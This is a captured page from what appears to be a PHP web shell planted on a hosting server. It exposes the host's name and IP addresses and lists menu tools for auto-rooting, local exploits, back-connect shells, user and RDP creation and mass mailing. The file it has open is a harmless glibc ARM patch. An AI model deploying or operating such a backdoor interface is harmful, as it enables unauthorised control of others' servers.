Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.130.109
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
glibc /
debian /
patches /
arm /
[ HOME SHELL ]
Name
Size
Permission
Action
local-arm-futex.diff
1012
B
-rw-r--r--
local-sigaction.diff
895
B
-rw-r--r--
local-soname-hack.diff
759
B
-rw-r--r--
local-vfp-sysdeps.diff
913
B
-rw-r--r--
unsubmitted-ldconfig-cache-abi...
4.13
KB
-rw-r--r--
unsubmitted-ldso-multilib.diff
491
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : unsubmitted-ldso-multilib.diff
--- a/elf/dl-load.c +++ b/elf/dl-load.c @@ -1710,6 +1710,15 @@ *found_other_class = true; goto close_and_out; } +#ifdef __arm__ + else if (!VALID_FLOAT_ABI (ehdr->e_flags)) + { + /* This is not a fatal error. On architectures where + soft-float and hard-float binaries can be run this + might happen. */ + goto close_and_out; + } +#endif else if (ehdr->e_ident[EI_DATA] != byteorder) { if (BYTE_ORDER == BIG_ENDIAN)
Close